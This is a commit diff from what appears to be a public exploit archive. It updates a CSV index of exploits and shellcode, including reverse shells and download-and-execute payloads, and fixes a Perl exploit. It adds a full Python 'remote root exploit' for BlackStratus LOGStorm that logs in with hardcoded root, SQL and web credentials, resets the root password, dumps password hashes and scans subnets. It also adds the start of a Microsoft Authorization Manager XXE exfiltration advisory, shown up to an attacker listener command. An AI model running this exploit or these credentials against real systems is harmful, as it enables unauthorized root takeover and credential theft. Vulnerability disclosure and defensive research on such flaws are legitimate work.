40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80
40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit) (3)",2016-07-29,xort,linux,remote,8000
40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Root Exploit (Metasploit)",2016-07-29,xort,linux,remote,8000
40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (3)",2016-07-29,xort,linux,remote,8000
40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Command Execution (Metasploit)",2016-07-29,xort,linux,remote,8000
40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - SEH Overflow (Egghunter)",2016-07-29,ch3rn0byl,windows,remote,80
40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
@ -15117,6 +15120,8 @@ id,file,description,date,author,platform,type,port
40835,platforms/windows/remote/40835.py,"Disk Pulse Enterprise 9.1.16 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40854,platforms/windows/remote/40854.py,"Disk Savvy Enterprise 9.1.14 - 'GET' Buffer Overflow",2016-12-01,vportal,windows,remote,0
40857,platforms/windows/remote/40857.txt,"Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution",2015-08-17,"David Jorm",windows,remote,0
40858,platforms/hardware/remote/40858.py,"BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Code Execution",2016-12-04,"Jeremy Brown",hardware,remote,0
40862,platforms/windows/remote/40862.py,"Alcatel Lucent Omnivista 8770 - Remote Code Execution",2016-12-04,malerisch,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15564,7 +15569,7 @@ id,file,description,date,author,platform,type,port
21252,platforms/arm/shellcode/21252.asm,"Linux/ARM (Raspberry Pi) - reverse_shell (tcp_10.1.1.2_0x1337) Shellcode (72 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
21253,platforms/arm/shellcode/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
21254,platforms/arm/shellcode/21254.asm,"Linux/ARM (Raspberry Pi) - chmod(_/etc/shadow__ 0777) Shellcode (41 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Password Protected TCP Bind Shell (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Password Protected TCP Bind Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
22489,platforms/windows/shellcode/22489.cpp,"Windows XP Pro SP3 - Full ROP calc Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0
23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0
24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0
@ -15674,7 +15679,7 @@ id,file,description,date,author,platform,type,port
39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - bindshell (Port 5600) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0
39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - bindshell (Port 5600) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() / SetFileAttributesA() / WinExec() / ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP Shellcode (IPv6) (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
39723,platforms/lin_x86/shellcode/39723.c,"Linux/x86 - Bind TCP Port 1472 (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
39728,platforms/lin_x86-64/shellcode/39728.py,"Linux/x86-64 - Bind Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0
@ -15702,13 +15707,13 @@ id,file,description,date,author,platform,type,port
40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - TCP Reverse Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0
40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Continuously-Probing Reverse Shell via Socket + Port-range + Password Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0
40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0
40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode (83_ 148_ 177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0
40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell / Multi-terminal / Password / Daemon Shellcode (83_ 148_ 177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0
40128,platforms/lin_x86/shellcode/40128.c,"Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)",2016-07-20,bashis,lin_x86,shellcode,0
40131,platforms/lin_x86/shellcode/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode,0
40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal Shellcode (84_ 122_ 172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0
40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Subtle Probing Reverse Shell / Timer_ Burst / Password / Multi-Terminal Shellcode (84_ 122_ 172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0
40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - NetCat Bind Shell with Port (44 / 52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0
40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - NetCat Bind Shellcode with Port (44 / 52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0
40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Port 9090 Bind Shellcode (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
@ -26560,7 +26565,7 @@ id,file,description,date,author,platform,type,port
23825,platforms/php/webapps/23825.txt,"Mambo Open Source 4.5 - 'index.php' mos_change_template Parameter Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0
23828,platforms/php/webapps/23828.txt,"e107 1.0.1 - Arbitrary JavaScript Execution (via Cross-Site Request Forgery)",2013-01-02,"Joshua Reynolds",php,webapps,0
23829,platforms/php/webapps/23829.txt,"e107 1.0.2 - SQL Injection (via Cross-Site Request Forgery)",2013-01-02,"Joshua Reynolds",php,webapps,0
23831,platforms/php/webapps/23831.py,"Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Root Exploit",2013-01-02,xistence,php,webapps,0
23831,platforms/php/webapps/23831.py,"Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Command Execution",2013-01-02,xistence,php,webapps,0
23834,platforms/php/webapps/23834.txt,"Mambo Open Source 4.5 - 'index.php' SQL Injection",2004-03-16,JeiAr,php,webapps,0
23835,platforms/php/webapps/23835.txt,"PHP-Nuke 6.x/7.0/7.1 - Image Tag Admin Command Execution",2004-03-16,"Janek Vind",php,webapps,0
23843,platforms/php/webapps/23843.txt,"Belchior Foundry VCard 2.8 - Authentication Bypass",2004-03-17,"saudi linux",php,webapps,0
@ -26748,7 +26753,7 @@ id,file,description,date,author,platform,type,port
24201,platforms/php/webapps/24201.txt,"PHP-Charts - Arbitrary PHP Code Execution",2013-01-18,AkaStep,php,webapps,0
24202,platforms/hardware/webapps/24202.txt,"Linksys WRT54GL (Firmware 4.30.15 build 2) - Multiple Vulnerabilities",2013-01-18,m-1-k-3,hardware,webapps,0
24203,platforms/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0
24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Root/SYSTEM Exploit",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0
24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Command Execution",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0
24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - Remote module_db.php File Inclusion",2004-06-15,loofus,php,webapps,0
24214,platforms/asp/webapps/24214.txt,"Web Wiz Forums 7.x - Registration_Rules.asp Cross-Site Scripting",2004-06-15,"Ferruh Mavituna",asp,webapps,0
24215,platforms/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 - usersL.php3 Multiple Parameter SQL Injection",2004-06-15,HEX,php,webapps,0
@ -30847,7 +30852,7 @@ id,file,description,date,author,platform,type,port
30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - (profile.php password0 Parameter) SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - (index.php language Parameter) SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Root Shell",2013-12-06,0_o,hardware,webapps,0
30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Command Execution",2013-12-06,0_o,hardware,webapps,0
30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",php,webapps,0
30064,platforms/php/webapps/30064.txt,"HLstats 1.35 - hlstats.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0
30065,platforms/php/webapps/30065.html,"GaliX 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-21,"John Martinelli",php,webapps,0
@ -31190,7 +31195,7 @@ id,file,description,date,author,platform,type,port
31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0
31028,platforms/php/webapps/31028.txt,"Article Dashboard - 'admin/login.php' Multiple SQL Injection",2008-01-15,Xcross87,php,webapps,0
31029,platforms/php/webapps/31029.pl,"WordPress Plugin Peter's Math Anti-Spam 0.1.6 - Audio CAPTCHA Security Bypass",2008-01-15,Romero,php,webapps,0
30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0
30691,platforms/php/webapps/30691.txt,"Alcatel Lucent Omnivista 4760 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0
30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0
30694,platforms/php/webapps/30694.txt,"Socketmail 2.2.1 - lostpwd.php Cross-Site Scripting",2007-10-19,"Ivan Sanchez",php,webapps,0
30695,platforms/php/webapps/30695.txt,"rNote 0.9.7 - rnote.php Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,php,webapps,0
@ -33541,7 +33546,7 @@ id,file,description,date,author,platform,type,port
34662,platforms/php/webapps/34662.txt,"x10 MP3 Automatic Search Engine 1.6.5b - lyrics.php id Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0
34663,platforms/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b - adult/video_listing.php key Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0
34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution / File Inclusion",2014-09-15,Vulnerability-Lab,ios,webapps,0
34666,platforms/php/webapps/34666.py,"ALCASAR 2.8.1 - Remote Root Code Execution",2014-09-15,eF,php,webapps,80
34666,platforms/php/webapps/34666.py,"ALCASAR 2.8.1 - Remote Code Execution",2014-09-15,eF,php,webapps,80
34672,platforms/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - Cross-Site Request Forgery",2014-09-15,"William Costa",linux,webapps,8090
34673,platforms/php/webapps/34673.txt,"Tukanas Classifieds 1.0 - 'index.php' SQL Injection",2009-08-28,Moudi,php,webapps,0
34674,platforms/php/webapps/34674.txt,"WebStatCaffe - stat/mostvisitpage.php nodayshow Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0
@ -36265,7 +36270,7 @@ id,file,description,date,author,platform,type,port
39213,platforms/php/webapps/39213.txt,"WordPress Plugin Featured Comments - Cross-Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0
39223,platforms/php/webapps/39223.txt,"ZeusCart - 'prodid' Parameter SQL Injection",2014-06-24,"Kenny Mathis",php,webapps,0
39231,platforms/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution",2016-01-13,"Matt Buzanowski",asp,webapps,0
39234,platforms/php/webapps/39234.py,"SevOne NMS 5.3.6.0 - Remote Root Exploit",2016-01-14,@iamsecurity,php,webapps,80
39234,platforms/php/webapps/39234.py,"SevOne NMS 5.3.6.0 - Remote Command Execution",2016-01-14,@iamsecurity,php,webapps,80
39235,platforms/multiple/webapps/39235.txt,"Manage Engine Applications Manager 12 - Multiple Vulnerabilities",2016-01-14,"Bikramaditya Guha",multiple,webapps,9090
39236,platforms/multiple/webapps/39236.py,"Manage Engine Application Manager 12.5 - Arbitrary Command Execution",2016-01-14,"Bikramaditya Guha",multiple,webapps,0
39237,platforms/php/webapps/39237.txt,"WordPress Plugin NextGEN Gallery 1.9.1 - 'photocrati_ajax' Arbitrary File Upload",2014-05-19,SANTHO,php,webapps,0
@ -36643,7 +36648,7 @@ id,file,description,date,author,platform,type,port
40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443
40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80
40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80
40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80
40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80
40168,platforms/php/webapps/40168.txt,"Open Upload 0.4.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-27,"Vinesh Redkar",php,webapps,80
40174,platforms/php/webapps/40174.txt,"WordPress Plugin Ultimate Product Catalog 3.9.8 - (do_shortcode via ajax) Blind SQL Injection",2016-07-29,"i0akiN SEC-LABORATORY",php,webapps,80
40180,platforms/linux/webapps/40180.txt,"Trend Micro Deep Discovery 3.7 / 3.8 SP1 (3.81) / 3.8 SP2 (3.82) - hotfix_upload.cgi Filename Remote Code Execution",2016-07-29,korpritzombie,linux,webapps,443
@ -36656,7 +36661,7 @@ id,file,description,date,author,platform,type,port
40205,platforms/cgi/webapps/40205.txt,"Davolink DV-2051 - Multiple Vulnerabilities",2016-08-05,"Eric Flokstra",cgi,webapps,80
40206,platforms/php/webapps/40206.txt,"WordPress Plugin Count Per Day 3.5.4 - Persistent Cross-Site Scripting",2016-08-05,"Julien Rentrop",php,webapps,80
40207,platforms/hardware/webapps/40207.txt,"NASdeluxe NDL-2400r 2.01.09 - OS Command Injection",2016-08-05,"SySS GmbH",hardware,webapps,80
40209,platforms/php/webapps/40209.py,"NUUO NVRmini 2 3.0.8 - Remote Root Exploit",2016-08-06,LiquidWorm,php,webapps,80
40209,platforms/php/webapps/40209.py,"NUUO NVRmini 2 3.0.8 - Remote Code Execution",2016-08-06,LiquidWorm,php,webapps,80
40210,platforms/php/webapps/40210.html,"NUUO NVRmini 2 3.0.8 - Cross-Site Request Forgery (Add Admin)",2016-08-06,LiquidWorm,php,webapps,80
40211,platforms/php/webapps/40211.txt,"NUUO NVRmini 2 3.0.8 - Local File Disclosure",2016-08-06,LiquidWorm,php,webapps,80
40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection",2016-08-06,LiquidWorm,php,webapps,80
@ -36669,7 +36674,7 @@ id,file,description,date,author,platform,type,port
40221,platforms/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery",2016-08-10,hyp3rlinx,php,webapps,80
40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server-Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80
40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80
40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Root Exploit",2016-08-10,LiquidWorm,php,webapps,80
40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Code Execution",2016-08-10,LiquidWorm,php,webapps,80
40229,platforms/jsp/webapps/40229.txt,"WebNMS Framework Server 5.2 / 5.2 SP1 - Multiple Vulnerabilities",2016-08-10,"Pedro Ribeiro",jsp,webapps,0
40231,platforms/java/webapps/40231.txt,"ColoradoFTP 1.3 Prime Edition (Build 8) - Directory Traversal",2016-08-11,Rv3Laboratory,java,webapps,80
40281,platforms/cgi/webapps/40281.txt,"Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0
@ -36785,7 +36790,7 @@ id,file,description,date,author,platform,type,port
40645,platforms/php/webapps/40645.txt,"InfraPower PPS-02-S Q213V1 - Authentication Bypass",2016-10-28,LiquidWorm,php,webapps,0
40641,platforms/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple Cross-Site Scripting",2016-10-28,LiquidWorm,php,webapps,0
40646,platforms/php/webapps/40646.txt,"InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery",2016-10-28,LiquidWorm,php,webapps,0
40640,platforms/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution",2016-10-28,LiquidWorm,hardware,webapps,0
40640,platforms/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Command Execution",2016-10-28,LiquidWorm,hardware,webapps,0
40637,platforms/php/webapps/40637.txt,"Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation",2016-10-27,"Xiphos Research Ltd",php,webapps,80
40650,platforms/php/webapps/40650.txt,"S9Y Serendipity 2.0.4 - Cross-Site Scripting",2016-10-31,Besim,php,webapps,0
40671,platforms/php/webapps/40671.txt,"School Registration and Fee System - Authentication Bypass",2016-11-01,opt1lc,php,webapps,0

Can't render this file because it is too large.

2
platforms/hardware/remote/26412.pl
View file

@ -87,7 +87,7 @@ while(1){
$bug = $host."/cgi-bin/system_config.cgi?file_name=".$file."&btn_type=load&action=APPLY";
$data=get($bug) || die "[-] Error: $ARGV[0] $!\n";
$data =~ s/Null/File not found!/gs;
if (defined $data =~ m{rows="30">(.*?)&lt;/textarea&gt;}sx){
if (defined $data =~ m{rows="30">(.*?)</textarea>}sx){
print $1."\n";
}
}

225
platforms/hardware/remote/40858.py Executable file
View file

@ -0,0 +1,225 @@
#!/usr/bin/python
# logstorm-root.py
#
# BlackStratus LOGStorm Remote Root Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2016
#
# -Synopsis-
#
# "Better Security and Compliance for Any Size Business"
#
# BlackStratus LOGStorm has multiple vulnerabilities that allow a remote unauthenticated user, among
# other things, to assume complete control over the virtual appliance with root privileges. This is
# possible due to multiple network servers listening for network connections by default, allowing
# authorization with undocumented credentials supported by appliance's OS, web interface and sql server.
#
# -Tested-
#
# v4.5.1.35
# v4.5.1.96
#
# -Usage-
#
# Dependencies: pip install paramiko MySQL-python
#
# There are (5) actions provided in this script: root, reset, sql, web and scan.
#
# [root] utilizes bug #1 to ssh login to a given <host> as root and run the 'id' command
# [reset] utilizes bug #2 to ssh login to a given <host> as privileged htinit user and resets the root password
# [sql*] utilizes bug #3 to sql login to a given <host> as privileged htr user and retrieve web portal credentials
# [web] utilizes bug #4 to http login to a given <host> as hardcoded webserveruser (presumably) admin account
# [scan] scans a given <host>/24 for potentially vulnerable appliances
#
# *sql only works remotely before license validation as afterwards sql server gets firewalled, becoming local only.
#
# Note: this exploit is not and cannot be weaponized simply because exploits are not weapons.
#
# -Fixes-
#
# BlackStratus did not coherently respond to product security inquiries, so there's no official fix. But
# customers may (now) root the appliance themselves to change the passwords, disable root login, firewall
# network services or remove additional user accounts to mitigate these vulnerabilities.. or choose another
# product altogether because this appliance, as of today, simply adds too much attack surface to the network.
#
# -Bonuses-
#
# 1) Another account's (htftp/htftp) shell is set to /bin/false, which affords at least a couple attacks
#
# 1.1) The appliance is vulnerable to CVE-2016-3115, which we can use to read/write to arbitrary files
# 1.2) We can use the login to do port forwarding and hit local services, such as the Java instance running
# in debug mode and probably exploitable with jdwp-shellifer.py (also netcat with -e is installed by default!)
#
# 2) More sql accounts: htm/htm_pwd and tvs/tvs_pwd
#
import sys
import socket
import time
from paramiko import ssh_exception
import paramiko
import MySQLdb
import httplib
import urllib
SSH_BANNER = "_/_/_/_/"
SSH_PORT = 22
MYSQL_PORT = 3306
MYSQL_DB = "htr"
MYSQL_CMD = "select USER_ID,hex(MD5_PASSWORD) from users;"
WEB_URL = "/tvs/layout/j_security_check"
ROOT_CREDS = ["root", "3!acK5tratu5"]
HTINIT_CREDS = ["htinit", "htinit"]
MYSQL_CREDS = ["htr", "htr_pwd"]
WEB_CREDS = ["webserviceuser", "donotChangeOnInstall"]
def main():
if(len(sys.argv) < 2):
print("Usage: %s <action> <host>" % sys.argv[0])
print("Eg. %s root 10.1.1.3\n" % sys.argv[0])
print("Actions: root reset sql web scan")
return
action = str(sys.argv[1])
host = str(sys.argv[2])
if("scan" not in action):
try:
socket.inet_aton(host)
except socket.error:
print("[-] %s doesn't look like a valid ip address" % host)
return
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
#
# ssh login as root and execute 'id'
#
if(action == "root"):
try:
ssh.connect(host, SSH_PORT, ROOT_CREDS[0], ROOT_CREDS[1], timeout=SSH_TIMEOUT)
except ssh_exception.AuthenticationException:
print("\n[-] Action failed, could not login with root credentials\n")
return
print("[+] Success!")
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("id")
print(ssh_stdout.readline())
return
#
# ssh login as htinit and reset root password to the default
#
elif(action == "reset"):
print("[~] Resetting password on %s..." % host)
try:
ssh.connect(host, SSH_PORT, HTINIT_CREDS[0], HTINIT_CREDS[1], timeout=SSH_TIMEOUT)
except ssh_exception.AuthenticationException:
print("\n[-] Reset failed, could not login with htinit credentials\n")
return
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("")
ssh_stdin.write("4" + "\n")
time.sleep(2)
ssh_stdin.write(ROOT_CREDS[1] + "\n")
time.sleep(2)
ssh_stdin.write("^C" + "\n")
time.sleep(1)
print("[+] Appliance root password should now be reset")
return
#
# sql login as htr and select user/hash columns from the web users table
#
elif(action == "sql"):
print("[~] Asking %s for it's web users and their password hashes..." % host)
try:
db = MySQLdb.connect(host=host, port=MYSQL_PORT, user=MYSQL_CREDS[0], passwd=MYSQL_CREDS[1], db=MYSQL_DB, connect_timeout=3)
except MySQLdb.Error as error:
print("\n[-] Failed to connect to %s:\n%s\n" % (host, error))
return
cursor = db.cursor()
cursor.execute(MYSQL_CMD)
data = cursor.fetchall()
print("[+] Got creds!\n")
for row in data:
print("USER_ID: %s\nMD5_PASSWORD: %s\n" % (row[0], row[1]))
db.close()
return
#
# http login as webserviceuser and gain presumably admin privileges
#
elif(action == "web"):
print("[~] Attempting to login as backdoor web user at %s..." % host)
try:
client = httplib.HTTPSConnection(host)
except:
print("[-] Couldn't establish SSL connection to %s" % host)
return
params = urllib.urlencode({"j_username" : WEB_CREDS[0], "j_password" : WEB_CREDS[1]})
headers = {"Host" : host, "Content-Type" : "application/x-www-form-urlencoded", "Content-Length" : "57"}
client.request("POST", WEB_URL, params, headers)
response = client.getresponse()
if(response.status == 408):
print("[+] Success!")
else:
print("[-] Service returned %d %s, which is actually not our criteria for success" % (response.status, response.reason))
return
#
# check the ssh network banner to identify appliances within range of <host>/24
#
elif(action == "scan"):
count = 0
print("[~] Scanning %s for LOGStorm appliances..." % sys.argv[2])
for x in range(1,255):
banner = None
#
# 10.1.1.1/24 -> 10.1.1.[x]
#
host = str(sys.argv[2]).split('/')[0][:-1] + str(x)
try:
ssh.connect(host, SSH_PORT, "user-that-doesnt-exist", "pass-that-doesnt-work", timeout=2)
except ssh_exception.NoValidConnectionsError:
pass
except socket.timeout:
pass
except ssh_exception.AuthenticationException as error:
banner = ssh._transport.get_banner()
if banner and SSH_BANNER in banner:
print("[!] %s\n" % host)
count+=1
print("[+] Found %d appliance(s)"% count)
return
if __name__ == "__main__":
main()

137
platforms/windows/local/40859.txt Executable file
View file

@ -0,0 +1,137 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-AZMAN-XXE-FILE-EXFILTRATION.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.microsoft.com
Product:
==============================
Microsoft Authorization Manager
v6.1.7601
The Authorization Manager allows you to set role-based permissions for
Authorization Manager-enabled applications.
You can store authorization stores in either XML files, Active Directory
Domain Services (AD DS), Active Directory Lightweight Directory
Services (AD LDS), or in Microsoft SQL Server databases.
Vulnerability Type:
===================
XML External Entity
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
"msxml3.dll" DLL is used by "Microsoft Management Console" azman.msc /
eventvwr.msc and other Windows components to process XML files.
The parser processes XML External Entity nodes allowing external
connections to be made to remote malicious DTD documents that can
potentially
allow access to files on users system to be exfiltrated to a remote server.
Therefore the XML parser is vulnerable to XXE attack if a user
unknowingly opens a malicious XML 'authorization store' document via remote
share/USB into 'Authorization Manager'.
"C:\Windows\system32\mmc.exe"
"C:\Windows\system32\azman.msc"
"C:\Windows\System32\msxml3.dll"
Exploit code(s):
===============
Start our listener on attacker server to access users files.
python -m SimpleHTTPServer 8080
